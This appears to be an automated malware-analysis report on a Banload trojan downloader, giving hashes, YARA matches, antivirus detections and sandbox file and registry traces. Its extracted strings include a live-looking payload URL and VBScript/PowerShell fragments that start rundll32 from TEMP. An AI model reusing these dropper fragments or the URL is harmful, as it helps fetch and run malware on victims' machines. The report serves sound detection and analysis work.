Report #6881

Binary
DLL: False
Size: 943.00KB
trid:
58.7% Win32 EXE PECompact compressed
14.1% DOS Borland compiled Executable
9.2% Win32 Dynamic Link Library
6.3% Win32 Executable
2.9% Win16/32 Executable Delphi generic
type: PE
wordsize: 32
Subsystem: Windows GUI
Hashes
md5: caaa6c62bfb3a656a0c1df9672a7ed76
sha1: c50abadfbfcb6118327e20a9204abd89416412a2
crc32: 0x3c88591a
sha224: 1997f4e339b018a704624864fb0d834181938eafb3904ce2a704d20f
sha256: 2c470624994f885f25ca75ef8f0411f7db0a263e9c83f6c83390bbe662fcbaa8
sha384: b45bcda63619248ae5bbf89a582065bf62242df215d1f0a46924642a6942ba2607ed986bc4c6bed9376281283670186c
sha512: 98b62b180ebf2214c7444c4fee4670d7459252c81b3e8136860f38e6b273b65b5878353d71e07e0797e98624706e2f66960926baadc4d03c746e65645444388e
ssdeep: 24576:nygs7ajRp+gNQOjy1xsf+3vQBqSbyz5y26GT4vez:ygGWp6JYsSyy25T4vez
Community
Google: False
HashLib: False

YARA
Matches: domain, Borland, IP, Borland_Delphi_30_, network_dropper, CRC32_poly_Constant, borland_delphi, Delphi_FormShow, CRC32_table, Microsoft_Visual_Cpp_v50v60_MFC, win_files_operation, IsPE32, win_hook, contentis_base64, screenshot, Borland_Delphi_v40_v50, Borland_Delphi_40_additional, win_mutex, keylogger, Borland_Delphi_40, IsWindowsGUI, anti_dbg, Borland_Delphi_Setup_Module, Borland_Delphi_DLL, url, win_registry, Borland_Delphi_30_additional, Borland_Delphi_v30, System_Tools
Suspicious: True

Strings
List
http://www.fi-deli-dade.top/dudu.jpg
t.Ht
Font.Style
Font.Name
objShell.run(rundll),0
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
Uh.cC
h.QA
Set objShell = CreateObject("WScript.Shell")
rundll = "PowerShell cd $env:TEMP ;Start-Process rundll32.exe " & "
B.rsrc
Delphi%.8X
Software\Borland\Locales
Software\Borland\Delphi\Locales
winspool.drv
winspool.drv
comctl32.dll
msimg32.dll
msimg32.dll
comctl32.dll
comctl32.dll
comctl32.dll
comctl32.dll
version.dll
uxtheme.dll
uxtheme.dll
urlmon.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
Spanish (Spain)
ControlOfs%.8X%.8X
WndProcPtr%.8X%.8X
name="Microsoft.Windows.Common-Controls"
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread The specified file was not found
tsThumbBtnVertPressed
tsUpperTrackVertPressed
tsGripperVertPressed
9%9E9T9o9s9
9%9A9R9f9n9
Reserved3
DefocusControl
Software\CodeGear\Locales
dsNormal dsPressed
Apartment
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
HandleAllocated
FTerminated
tpDownPressed
Sub-menu is not in menu
tpUpPressed
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Division by zero

Foremost
Matches: 0.exe, 943 KB
Suspicious: True
Heuristics
IPs
hasIPs: False
Allowed:
Suspicious:
hasAllowed: False
hasSuspicious: False

URLs
hasURLs: True
Allowed:
Suspicious: http://www.fi-deli-dade.top/dudu.jpg
hasAllowed: False
hasSuspicious: True

Files
hasFiles: True
Allowed: ole32.dll, msimg32.dll, USER32.DLL, imm32.dll, kernel32.dll, oleaut32.dll, uxtheme.dll, comctl32.dll, gdi32.dll, urlmon.dll, DWMAPI.DLL, advapi32.dll, version.dll
Suspicious:
hasAllowed: True
hasSuspicious: False

Binary
Sizes
RVA: 16 (Suspicious: False)
Code Size: 169984 (Suspicious: False)
Image Address: 4194304 (Suspicious: False)
Stack: 16384 (Suspicious: False)
Headers: 1024 (Suspicious: False)
Suspicious: False

Symbols
Number: 0 (Suspicious: True)
Pointer: 0 (Suspicious: True)
Directories Number: 16 (Suspicious: False)

Checksum
Value: 0 (Suspicious: True)

Sections
Allowed: .text, .itext, .data, .bss, .idata, .didata, .tls, .rdata, .reloc, .rsrc
Suspicious:
hasAllowed: True
hasSections: True
hasSuspicious: False

Versions
OS Version: 5 (Suspicious: False)
Image Version: 5 (Suspicious: True)
Linker Version: 2.25 (Suspicious: False)
Subsystem Version: 5.0 (Suspicious: False)
Suspicious: False

EntryPoint
Address: 797912 (Suspicious: False)

Anomalies
Anomalies: The header checksum and the calculated checksum do not match.
hasAnomalies: True

Libraries
Allowed: ole32.dll, msimg32.dll, user32.dll, imm32.dll, kernel32.dll, oleaut32.dll, uxtheme.dll, comctl32.dll, gdi32.dll, urlmon.dll, dwmapi.dll, advapi32.dll, version.dll
hasLibs: True
Suspicious:
hasAllowed: True
hasSuspicious: False

Timestamp
Value: 2017-11-06 17:52:26
Valid: True
Past: False
Future: False

Compilation
Packed: False
Missing: False
Packers:
Compiled: True
Compilers: Borland Delphi 3.0 (???), Borland Delphi 4.0, Borland Delphi v6.0 - v7.0

Obfuscation
XOR: False
Fuzzing: False

PEDetector
Matches: None
Suspicious: False

Disassembly
hasTricks: True
Tricks
pushret
.data: 8
.text: 27
.itext: 4
.reloc: 1

pushpopmath
.data: 4
.rsrc: 3
.text: 13
.reloc: 46

ss register
.reloc: 1

garbagebytes
.data: 3
.text: 21
.itext: 4
.reloc: 1

hookdetection
.text: 2

software breakpoint
.text: 2
.reloc: 18

programcontrolflowchange
.data: 3
.text: 21
.itext: 4
.reloc: 1

cpuinstructionsresultscomparison
.data: 5
.rsrc: 1
.text: 16

AVclass
banload: 1

VirusTotal
SCANS (DETECTION RATE = 61.19%)
Engine | Result | Version | Update | Detected
AVG | Win32:Malware-gen | 18.1.3800.0 | 20180215 | True
CMC | | 1.1.0.977 | 20180215 | False
MAX | malware (ai score=98) | 2017.11.15.1 | 20180215 | True
Bkav | | 1.3.0.9466 | 20180212 | False
K7GW | Trojan-Downloader ( 005110381 ) | 10.40.26215 | 20180215 | True
ALYac | Trojan.GenericKD.6167764 | 1.1.1.5 | 20180215 | True
Avast | Win32:Malware-gen | 18.1.3800.0 | 20180215 | True
Avira | TR/Dldr.Banload.wdonf | 8.3.3.6 | 20180215 | True
Baidu | | 1.0.0.2 | 20180208 | False
Cyren | W32/Trojan.EDBG-2540 | 5.4.30.7 | 20180215 | True
DrWeb | | 7.0.28.2020 | 20180215 | False
GData | Trojan.GenericKD.6167764 | A:25.16037B:25.11588 | 20180215 | True
Panda | Trj/GdSda.A | 4.6.4.2 | 20180214 | True
VBA32 | | 3.12.28.0 | 20180215 | False
VIPRE | Trojan.Win32.Generic!BT | 64612 | 20180215 | True
Zoner | | 1.0 | 20180215 | False
AVware | Trojan.Win32.Generic!BT | 1.5.0.42 | 20180215 | True
ClamAV | | 0.99.2.0 | 20180215 | False
Comodo | | | 20180215 | False
F-Prot | | 4.7.1.166 | 20180215 | False
Ikarus | Trojan-Downloader.Win32.Banload | 0.1.5.2 | 20180215 | True
McAfee | GenericRXCR-WG!CAAA6C62BFB3 | 6.0.6.653 | 20180215 | True
Rising | Spyware.Banker!8.8D (TFE:4:TGEM7PPzkHN) | 25.0.0.1 | 20180215 | True
Sophos | Mal/Generic-S | 4.98.0 | 20180215 | True
Yandex | PUA.Agent! | 5.5.1.3 | 20180214 | True
Zillya | Downloader.Banload.Win32.84079 | 2.0.0.3491 | 20180214 | True
Arcabit | Trojan.Generic.D5E1CD4 | 1.0.0.830 | 20180215 | True
Cylance | | 2.3.1.101 | 20180215 | False
Endgame | malicious (high confidence) | 1.2.0 | 20180214 | True
Tencent | Win32.Adware.Generic.Tays | 1.0.0.1 | 20180215 | True
ViRobot | | 2014.3.20.0 | 20180215 | False
Webroot | | 1.0.0.207 | 20180215 | False
eGambit | | v4.3.4 | 20180215 | False
Ad-Aware | Trojan.GenericKD.6167764 | 3.0.3.1010 | 20180215 | True
AegisLab | | 4.2 | 20180215 | False
Emsisoft | Trojan.GenericKD.6167764 (B) | 4.0.2.899 | 20180215 | True
F-Secure | Trojan.GenericKD.6167764 | 11.0.19100.45 | 20180215 | True
Fortinet | W32/Banload.WYI!tr | 5.4.247.0 | 20180215 | True
Invincea | | 6.3.4.26036 | 20180121 | False
Jiangmin | | 16.0.100 | 20180215 | False
Kingsoft | | 2013.8.14.323 | 20180215 | False
Paloalto | generic.ml | 1.0 | 20180215 | True
Symantec | Trojan.Gen.2 | 1.5.0.0 | 20180215 | True
nProtect | | 2018-02-15.02 | 20180215 | False
AhnLab-V3 | Trojan/Win32.Banload.C2265887 | 3.11.3.19504 | 20180214 | True
Kaspersky | not-a-virus:HEUR:AdWare.Win32.Generic | 15.0.1.13 | 20180215 | True
Microsoft | | 1.1.14500.5 | 20180215 | False
Qihoo-360 | Win32/Virus.Adware.b51 | 1.0.0.1120 | 20180215 | True
TheHacker | | 6.8.0.5.2403 | 20180213 | False
ZoneAlarm | not-a-virus:HEUR:AdWare.Win32.Generic | 1.0 | 20180215 | True
Cybereason | malicious.2bfb3a | 1.2.27 | 20180205 | True
ESET-NOD32 | a variant of Win32/TrojanDownloader.Banload.XZR | 16908 | 20180215 | True
TrendMicro | TROJ_GEN.R002C0PK817 | 9.862.0.1074 | 20180215 | True
WhiteArmor | | | 20180205 | False
BitDefender | Trojan.GenericKD.6167764 | 7.2 | 20180215 | True
CrowdStrike | malicious_confidence_80% (W) | 1.0 | 20170201 | True
K7AntiVirus | Trojan-Downloader ( 005110381 ) | 10.40.26219 | 20180215 | True
SentinelOne | | 1.0.12.202 | 20180115 | False
Avast-Mobile | | 180215-00 | 20180215 | False
Malwarebytes | | 2.1.1.1115 | 20180215 | False
TotalDefense | | 37.1.62.1 | 20180215 | False
CAT-QuickHeal | Trojan.Generic | 14.00 | 20180215 | True
NANO-Antivirus | Riskware.Win32.Banload.evbcqc | 1.0.100.21498 | 20180215 | True
MicroWorld-eScan | Trojan.GenericKD.6167764 | 14.0.297.0 | 20180215 | True
SUPERAntiSpyware | | 5.6.0.1032 | 20180215 | False
McAfee-GW-Edition | BehavesLike.Win32.AdwareDealPly.dh | v2015 | 20180215 | True
TrendMicro-HouseCall | TROJ_GEN.R002C0PK817 | 9.950.0.1006 | 20180215 | True
total: 67
scan_id: 2c470624994f885f25ca75ef8f0411f7db0a263e9c83f6c83390bbe662fcbaa8-1518691081
resource: caaa6c62bfb3a656a0c1df9672a7ed76
positives: 41
scan_date: 2018-02-15 10:38:01
verbose_msg: Scan finished, information embedded
response_code: 1
File
Trace
Time | Operation | PID | Process | Path | File name
19/2/2020 - 19:45:43.872 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\mingliu.ttc |
19/2/2020 - 19:45:44.12 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\mingliu.ttc |
19/2/2020 - 19:45:44.247 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\simsun.ttc |
19/2/2020 - 19:45:44.247 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\simsun.ttc |
19/2/2020 - 19:45:44.247 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\gulim.ttc |
19/2/2020 - 19:45:44.481 | Open | 1480 | C:\malware.exe | C:\Windows\Fonts\gulim.ttc |
19/2/2020 - 19:45:44.809 | Open | 1480 | C:\malware.exe | C:\ |
19/2/2020 - 19:45:44.809 | Unknown | 1480 | C:\malware.exe | C:\ |
19/2/2020 - 19:45:44.809 | Open | 1480 | C:\malware.exe | C:\api-ms-win-downlevel-shlwapi-l2-1-0.dll |
19/2/2020 - 19:45:44.809 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll |
19/2/2020 - 19:45:44.809 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll | api-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.809 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll |
19/2/2020 - 19:45:44.809 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll | api-ms-win-downlevel-shlwapi-l2-1-0.dll
19/2/2020 - 19:45:44.825 | Open | 1480 | C:\malware.exe | C:\Secur32.dll |
19/2/2020 - 19:45:44.825 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\secur32.dll |
19/2/2020 - 19:45:44.825 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\secur32.dll |
19/2/2020 - 19:45:44.872 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files |
19/2/2020 - 19:45:44.872 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files |
19/2/2020 - 19:45:44.872 | Open | 1480 | C:\malware.exe | C:\api-ms-win-downlevel-advapi32-l2-1-0.dll |
19/2/2020 - 19:45:44.872 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll |
19/2/2020 - 19:45:44.872 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll | api-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.872 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll |
19/2/2020 - 19:45:44.872 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll | api-ms-win-downlevel-advapi32-l2-1-0.dll
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\winhttp.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\winhttp.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\webio.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\webio.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\IPHLPAPI.DLL |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\IPHLPAPI.DLL |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\IPHLPAPI.DLL |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\WINNSI.DLL |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\winnsi.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\winnsi.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\DNSAPI.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dnsapi.dll |
19/2/2020 - 19:45:44.918 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dnsapi.dll |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\mswsock.dll |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\mswsock.dll |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\wship6.dll |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\wship6.dll |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\History |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\History |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\History |
19/2/2020 - 19:45:44.981 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5 |
19/2/2020 - 19:45:44.981 | Unknown | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Microsoft\Windows\History\History.IE5 |
19/2/2020 - 19:45:45.90 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\netprofm.dll |
19/2/2020 - 19:45:45.90 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\netprofm.dll |
19/2/2020 - 19:45:45.90 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\nlaapi.dll |
19/2/2020 - 19:45:45.90 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\nlaapi.dll |
19/2/2020 - 19:45:45.137 | Open | 1480 | C:\malware.exe | C:\dhcpcsvc6.DLL |
19/2/2020 - 19:45:45.137 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc6.dll |
19/2/2020 - 19:45:45.137 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc6.dll | dhcpcsvc6.dll
19/2/2020 - 19:45:45.137 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc6.dll |
19/2/2020 - 19:45:45.137 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc6.dll | dhcpcsvc6.dll
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\WSHTCPIP.DLL |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\WSHTCPIP.DLL |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\dhcpcsvc.DLL |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\dhcpcsvc.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\CRYPTSP.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\cryptsp.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\cryptsp.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rsaenh.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\RpcRtRemote.dll |
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\RpcRtRemote.dll |
19/2/2020 - 19:45:45.184 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\RpcRtRemote.dll | RpcRtRemote.dll
19/2/2020 - 19:45:45.184 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\RpcRtRemote.dll |
19/2/2020 - 19:45:45.184 | Unknown | 1480 | C:\malware.exe | C:\Windows\SysWOW64\RpcRtRemote.dll | RpcRtRemote.dll
19/2/2020 - 19:45:45.247 | Open | 1480 | C:\malware.exe | C:\rasadhlp.dll |
19/2/2020 - 19:45:45.247 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rasadhlp.dll |
19/2/2020 - 19:45:45.247 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\rasadhlp.dll |
19/2/2020 - 19:45:45.293 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\npmproxy.dll |
19/2/2020 - 19:45:45.293 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\npmproxy.dll |
19/2/2020 - 19:45:46.403 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\wininet.dll |
19/2/2020 - 19:45:46.403 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\wininet.dll |
19/2/2020 - 19:45:47.12 | Open | 1480 | C:\malware.exe | C:\Users\Behemot\AppData\Local\Temp\Tgs_PcEEEB3BEDb.hlp |
19/2/2020 - 19:45:47.12 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\imageres.dll |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\imageres.dll |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\imageres.dll |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\pt-BR\imageres.dll.mui |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\System32\pt-BR\imageres.dll.mui |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\pt\imageres.dll.mui |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\en-US\imageres.dll.mui |
19/2/2020 - 19:45:47.28 | Read | 1480 | C:\malware.exe | C:\Windows\SysWOW64\en-US\imageres.dll.mui | imageres.dll.mui
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\ole32.dll |
19/2/2020 - 19:45:47.28 | Open | 1480 | C:\malware.exe | C:\Windows\SysWOW64\ole32.dll |

Process
Trace

Analysis
Reason
Timeout

Status
Successfully Executed

Results
1

Registry
Trace
Time | Operation | PID | Process | Key | Value
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | ProxyBypass
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | IntranetName
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyEnable
19/2/2020 - 19:45:44.918 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer
19/2/2020 - 19:45:44.918 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyOverride
19/2/2020 - 19:45:44.918 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | AutoConfigURL
19/2/2020 - 19:45:44.918 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings | AutoDetect
19/2/2020 - 19:45:44.918 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | SavedLegacySettings
19/2/2020 - 19:45:44.981 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix
19/2/2020 - 19:45:44.981 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix
19/2/2020 - 19:45:44.981 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix
19/2/2020 - 19:45:45.340 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionReason
19/2/2020 - 19:45:45.340 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionTime
19/2/2020 - 19:45:45.340 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecision
